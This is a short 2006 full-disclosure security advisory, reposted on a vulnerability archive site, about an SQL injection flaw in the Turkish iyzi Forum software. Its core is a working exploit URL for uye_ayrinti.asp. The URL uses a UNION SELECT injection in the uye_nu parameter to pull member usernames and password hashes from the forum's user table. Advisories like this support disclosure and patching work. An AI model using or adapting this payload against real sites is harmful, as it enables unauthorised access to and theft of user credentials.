Computer Security

Security Advisory: iyzi Forum s1 b2 (tr) SQL Injection Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  ZoomStats <= 1.0.2 (mysql.php) Remote File Include Vulnerability

  [SA22075] Web-News "content_page"
File Inclusion Vulnerability

  [Full-disclosure] Local File Inclusion : Kietu

  [Full-disclosure] Remote File Include in syntaxCMS

From:fixtr_(at)_bsdmail.com <fixtr_(at)_bsdmail.com>
Date:25.09.2006
Subject:iyzi Forum s1 b2 (tr) SQL Injection Vulnerability

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ iyzi Forum s1 b2 (tr) SQL Injection Vulnerability      +
+ Author  : Fix TR                                       +
+ Site    : www.hack.gen.tr                              +
+ Contact : fixtr[at]bsdmail.com                         +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


Download & Info: http://www.aspindir.com/Goster/2981
Bug In         : uye_ayrinti.asp
Risk           : High

Exp:
http://[victim]/[path]/uye/uye_ayrinti.asp?uye_nu=1+union+select+1,kullanici_adi,
null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,
null,null+from+iyzi_uyeler+where+editor+like+1

Password encrytped with SHA-256

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server